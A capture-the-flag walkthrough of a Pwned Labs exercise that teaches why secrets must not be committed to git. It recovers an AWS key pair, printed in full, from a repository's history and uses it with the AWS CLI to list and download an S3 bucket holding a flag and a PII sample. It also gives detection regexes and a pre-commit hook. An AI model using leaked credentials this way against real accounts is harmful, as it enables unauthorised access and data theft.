# Hunt for Secrets in Git Repos

CTF Source: [Pwned Labs](https://pwnedlabs.io/labs/hunt-for-secrets-in-git-repos)

## Overview

In this walkthrough, we'll discover a set of AWS access keys (credentials) that were committed to GitHub and later removed. Because the credentials were never rotated or deleted, they're still usable, and we can recover them from the repository's commit history. We'll then use these credentials to access sensitive data in an S3 bucket.

## Pre-Requisites

This [GitHub repository](https://github.com/huge-logistics/cargo-logistics-dev) serves as our target. We're going to download it locally and run a secrets scanning tool called [trufflehog](https://app.gitbook.com/o/jZWSDbhtOG1szHMuDH9S/s/8yu8YbDfwd1VqEdUxGyA/~/changes/190/devsecops/secrets-scanning/trufflehog).

* Download the repo: `git clone https://github.com/huge-logistics/cargo-logistics-dev.git`
* Install trufflehog: `pip install trufflehog`
* Install awscli: `brew install awscli` (macOS) or `apt install awscli` (Debian/Ubuntu)

## Walkthrough

Trufflehog is a tool for finding secrets, but other solutions like [git-secrets](https://github.com/awslabs/git-secrets) exist. It's good to keep several scanners on hand, as each works differently and might surface findings the others miss.

### Finding credentials in code

We'll start by scanning the repository with trufflehog.

```sh
trufflehog --regex --entropy=False cargo-logistics-dev/
```

<pre class="language-sh"><code class="lang-sh">[snip]
<strong>~~~~~~~~~~~~~~~~~~~~~
</strong>Reason: AWS API Key
Date: 2023-07-05 10:46:16
Hash: ea1a7618508b8b0d4c7362b4044f1c8419a07d99
Filepath: log-s3-test/log-upload.php
Branch: origin/main
Commit: Delete log-s3-test directory
AKIAWHEOTHRFSGQITLIY
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: Generic Secret
Date: 2023-07-05 10:46:16
Hash: ea1a7618508b8b0d4c7362b4044f1c8419a07d99
Filepath: log-s3-test/log-upload.php
Branch: origin/main
Commit: Delete log-s3-test directory
secret' => "IqHCweAXZOi8WJlQrhuQulSuGnUO51HFgy7ZShoB"
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: AWS API Key
[snip]
</code></pre>

The scan found an AWS access key ID and secret access key! `AKIAWHEOTHRFSGQITLIY:IqHCweAXZOi8WJlQrhuQulSuGnUO51HFgy7ZShoB`

We also discovered the filename (<mark style="color:red;">log-upload.php</mark>) that contained these credentials and the commit (<mark style="color:red;">Delete log-s3-test directory</mark>) that removed them.
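To illustrate why removing a file does not remove the secret, here is a minimal sketch that uses a throwaway repository rather than the target repo. The key, file contents, and commit messages are made-up placeholders; only the `git` commands themselves are standard.

```bash
# Throwaway repo demonstrating that a deleted secret stays in history.
# The key below is a made-up placeholder, not a real credential.
demo_repo="$(mktemp -d)"
fake_key="AKIAEXAMPLEEXAMPLE12"   # hypothetical: "AKIA" + 16 characters

git -C "$demo_repo" init --quiet
# Inline identity so the sketch runs without any global git config.
commit() {
  git -C "$demo_repo" -c user.name=demo -c user.email=demo@example.com \
    commit --quiet "$@"
}

# Commit a file containing the fake key, then delete it in a second commit.
printf "'key' => \"%s\"\n" "$fake_key" > "$demo_repo/log-upload.php"
git -C "$demo_repo" add log-upload.php
commit -m "Add log upload script"

git -C "$demo_repo" rm --quiet log-upload.php
commit -m "Delete log upload script"

# The working tree no longer contains the key...
in_worktree="$(grep -rE --exclude-dir=.git 'AKIA[0-9A-Z]{16}' "$demo_repo" || true)"

# ...but searching the patches of every commit still surfaces it.
in_history="$(git -C "$demo_repo" log --all -p -S 'AKIA' \
  | grep -oE 'AKIA[0-9A-Z]{16}' | sort -u)"

echo "worktree: ${in_worktree:-<nothing>}"
echo "history:  $in_history"
```

The same `git log --all -p -S 'AKIA'` search could be pointed at the cloned `cargo-logistics-dev/` directory as a manual cross-check of the scanner output.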

### Finding an S3 bucket name in code

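If we examine that [commit](https://github.com/huge-logistics/cargo-logistics-dev/commit/ea1a7618508b8b0d4c7362b4044f1c8419a07d99) and the related file in the GitHub repo, we can see the deleted `log-upload.php`, including the S3 bucket name (`huge-logistics-transact`) and region (`us-east-1`) it references.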

<figure><img src="/files/w0leTGCihFhR9aLC05Jw" alt=""><figcaption></figcaption></figure>

### Obtaining the Flag from S3

Let's configure the AWS CLI with the credentials we found by running `aws configure`. We'll use the region `us-east-1`, as seen in the code above; the same value also appears in the `x-amz-bucket-region` header returned by a curl request:

```bash
curl -I https://s3.amazonaws.com/huge-logistics-transact

HTTP/1.1 403 Forbidden
x-amz-bucket-region: us-east-1
x-amz-request-id: 0CJ7HZEKMW8Y83QX
x-amz-id-2: U8sH+rTpX5xbD0oiNTPYT1KxC0HZ1Pr2kRxjspOqsdAVplrdeFh3o2tySisRAZvDrxzJTZCD5o0=
Content-Type: application/xml
Date: Tue, 02 Jan 2024 00:31:44 GMT
Server: AmazonS3
```
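If only the region is needed, the header can be pulled out with a small filter. The sketch below parses a saved copy of the response headers shown above, so it runs without network access; the variable names are illustrative.

```bash
# Headers as captured in the curl output above (a saved sample).
headers='HTTP/1.1 403 Forbidden
x-amz-bucket-region: us-east-1
Content-Type: application/xml
Server: AmazonS3'

# Strip carriage returns (HTTP header lines end in CRLF), then match the
# header name case-insensitively and print its value.
region="$(printf '%s\n' "$headers" \
  | tr -d '\r' \
  | awk -F': ' 'tolower($1) == "x-amz-bucket-region" { print $2 }')"

echo "$region"

# Against the live bucket, the same filter would read from curl instead:
#   curl -sI https://s3.amazonaws.com/huge-logistics-transact | tr -d '\r' | awk ...
```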

Next, we can list the bucket contents like so:

```bash
aws s3 ls s3://huge-logistics-transact

2023-07-05 09:53:50         32 flag.txt
2023-07-04 11:15:47          5 transact.log
2023-07-05 09:57:36      51968 web_transactions.csv
```
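The listing above relies on the credentials configured earlier. As an alternative to the interactive `aws configure` prompt, the sketch below writes a named profile into a temporary directory so the found keys stay separate from any existing `~/.aws` setup. The profile name `ctf` and the placeholder key values are assumptions for illustration; the environment variables are the standard ones the AWS CLI reads.

```bash
# Isolated config location so the sketch does not touch ~/.aws.
aws_dir="$(mktemp -d)"
export AWS_SHARED_CREDENTIALS_FILE="$aws_dir/credentials"
export AWS_CONFIG_FILE="$aws_dir/config"
export AWS_PROFILE="ctf"   # hypothetical profile name

# Placeholders: substitute the key pair recovered from the commit history.
access_key_id="${ACCESS_KEY_ID:-AKIAEXAMPLEEXAMPLE12}"
secret_access_key="${SECRET_ACCESS_KEY:-exampleSecretValue}"

cat > "$AWS_SHARED_CREDENTIALS_FILE" <<EOF
[$AWS_PROFILE]
aws_access_key_id = $access_key_id
aws_secret_access_key = $secret_access_key
EOF

# Named profiles use a "profile " prefix in the config file.
cat > "$AWS_CONFIG_FILE" <<EOF
[profile $AWS_PROFILE]
region = us-east-1
EOF

chmod 600 "$AWS_SHARED_CREDENTIALS_FILE"

# With the variables above exported, the walkthrough commands pick up the
# profile automatically, for example:
#   aws sts get-caller-identity
#   aws s3 ls s3://huge-logistics-transact
```

Running `aws sts get-caller-identity` first is a quick way to confirm the keys are still valid before touching the bucket.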

Then we can download the contents of the S3 bucket.

```bash
aws s3 cp s3://huge-logistics-transact . --recursive

download: s3://huge-logistics-transact/transact.log to ./transact.log
download: s3://huge-logistics-transact/flag.txt to ./flag.txt     
download: s3://huge-logistics-transact/web_transactions.csv to ./web_transactions.csv
```

Finally, we can read the flag and find plaintext PII in `web_transactions.csv`!

```bash
cat ./flag.txt

fe10[SNIP]
```

```bash
head -n 5 ./web_transactions.csv 

id,username,email,ip_address
1,aemblen0,csautter0@soup.io,196.54.202.51
2,jpiff1,rgovett1@cafepress.com,59.222.23.53
3,aharbour2,bgilfether2@seattletimes.com,178.60.232.230
4,clomis3,rhardwich3@alibaba.com,165.58.39.76
```

## Wrap-up

As demonstrated, hard-coding credentials in code is never a good idea. Although the credentials were removed from the file, they still existed in the git commit history. Because they were never rotated or deleted, the leak led to the compromise of PII stored in an S3 bucket.

Automated scanners regularly crawl GitHub and similar platforms for credentials. While Amazon and other "good" vendors or users might alert you after discovering your leaked credentials, plenty of users with malicious intent are harvesting them too.

It's important to scan your code with tools like [git-secrets](https://github.com/awslabs/git-secrets) before committing. Git-secrets in particular hooks into the commit process and prevents the commit from occurring if credentials are discovered.
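To show the idea of a hook that blocks a commit, here is a minimal sketch of a hand-written `pre-commit` hook in a throwaway repository. It is a simplified stand-in, not what git-secrets actually installs: the single regex, file name, and fake key are assumptions for illustration.

```bash
# Throwaway repo with a minimal pre-commit hook.
hook_repo="$(mktemp -d)"
git -C "$hook_repo" init --quiet
mkdir -p "$hook_repo/.git/hooks"

cat > "$hook_repo/.git/hooks/pre-commit" <<'EOF'
#!/bin/sh
# Reject the commit if any added line in the staged diff looks like an
# AWS access key ID ("AKIA" followed by 16 uppercase letters or digits).
if git diff --cached -U0 | grep -E '^\+.*AKIA[0-9A-Z]{16}' >/dev/null; then
  echo "pre-commit: possible AWS access key in staged changes" >&2
  exit 1
fi
EOF
chmod +x "$hook_repo/.git/hooks/pre-commit"

# Stage a file containing a made-up key and attempt to commit it.
echo 'key = "AKIAEXAMPLEEXAMPLE12"' > "$hook_repo/config.txt"
git -C "$hook_repo" add config.txt

if git -C "$hook_repo" -c user.name=demo -c user.email=demo@example.com \
     commit --quiet -m "Add config" 2>/dev/null; then
  commit_result="allowed"
else
  commit_result="blocked"
fi

echo "commit was $commit_result"
```

With git-secrets itself, the equivalent per-repository setup is `git secrets --install` followed by `git secrets --register-aws`, which registers a broader set of AWS patterns than the single regex used here.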

[Amazon provides guidance](https://aws.amazon.com/blogs/security/what-to-do-if-you-inadvertently-expose-an-aws-access-key/) on what to do when AWS credentials get exposed.

